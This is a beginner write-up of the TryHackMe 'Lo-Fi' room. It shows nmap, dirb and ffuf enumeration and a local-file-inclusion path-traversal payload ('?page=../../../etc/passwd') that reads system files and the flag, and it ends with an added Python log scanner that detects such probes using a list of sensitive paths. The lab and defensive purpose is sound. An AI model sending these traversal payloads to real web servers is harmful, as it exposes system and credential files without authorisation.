TryhackMe - Lo-Fi Writeup

My writeup for TryHackMe Room: Lo-Fi

TECH

2/19/2025

Target IP: 10.10.228.19

Box IP: 10.10.113.125

Initial Nmap scan

sudo nmap -A 10.10.228.19 -vv

Taking note of the open ports, I'm going to enumerate port 80 using dirb (dirb takes the wordlist as a positional argument; the big wordlist ships at /usr/share/wordlists/dirb/big.txt on Kali):

dirb http://10.10.228.19 /usr/share/wordlists/dirb/big.txt

Attempting to open the discovered pages results in access denied...

Attempting the URL "http://10.10.20.7/?page=/" results in a page asking hackers to stay away... (͠≖ ͜ʖ͠≖)

The room suggests LFI knowledge is needed, so I tested the page parameter with the ffuf tool (filtering out responses with the 124-line default page):

ffuf -w /usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt -u "http://10.10.228.19/?page=FUZZ" -fl 124

Out of that output, let's start with the shortest payload: ../../../etc/passwd

Plug that into the URL:

http://10.10.228.19/?page=../../../etc/passwd

It works... let's try the simplest guess for the flag first:

http://10.10.228.19/?page=../../../etc/flag.txt

No luck in /etc, maybe one more go...

http://10.10.228.19/?page=../../../flag.txt

BINGO!
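From the defender's side: an added example (not part of the room or this writeup) that scans web-server access log lines for the kind of ?page= traversal probes used above, including percent-encoded and double-encoded variants. The log lines, the combined log format and the sensitive-path list are constructed assumptions.

```python
# Added detection example: flag LFI / path-traversal probes in a `page=` parameter.
# Log format and sample lines are constructed for this example.
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined"-style access line: client ip ... "METHOD target proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
TRAVERSAL = re.compile(r'(^|/)\.\.(/|$)')          # a ".." path segment anywhere
SENSITIVE = ('/etc/passwd', '/etc/shadow', '/proc/self/environ', 'flag.txt')

def normalize(value: str) -> str:
    """Percent-decode repeatedly (max 3 rounds) so %2e%2e and %252e%252e are both caught."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace('\\', '/')                # treat backslashes as separators

def classify(target: str, param: str = 'page'):
    """Return a reason string if `param` in the request target looks like an LFI probe."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for raw in qs.get(param, []):
        v = normalize(raw)
        if TRAVERSAL.search(v):
            return f'traversal:{v}'
        if v.startswith('/') or any(s in v for s in SENSITIVE):
            return f'absolute-or-sensitive:{v}'
    return None

def scan(lines):
    """Return [(ip, status, reason)] for every log line flagged as an LFI probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (reason := classify(m['target'])):
            hits.append((m['ip'], int(m['status']), reason))
    return hits

SAMPLE_LOG = [  # constructed lines mirroring the requests made in this writeup
    '10.0.0.5 - - [19/Feb/2025:10:00:01 +0000] "GET /?page=home HTTP/1.1" 200 512 "-" "curl/8.0"',
    '10.0.0.5 - - [19/Feb/2025:10:00:02 +0000] "GET /?page=/ HTTP/1.1" 200 301 "-" "curl/8.0"',
    '10.0.0.9 - - [19/Feb/2025:10:00:03 +0000] "GET /?page=../../../etc/passwd HTTP/1.1" 200 1740 "-" "curl/8.0"',
    '10.0.0.9 - - [19/Feb/2025:10:00:04 +0000] "GET /?page=..%2f..%2f..%2fflag.txt HTTP/1.1" 200 38 "-" "curl/8.0"',
    '10.0.0.9 - - [19/Feb/2025:10:00:05 +0000] "GET /?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1740 "-" "curl/8.0"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request (as opposed to a 403 or 404) is the signal that the inclusion likely succeeded and warrants triage.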

Honestly, a very fun CTF for a starter!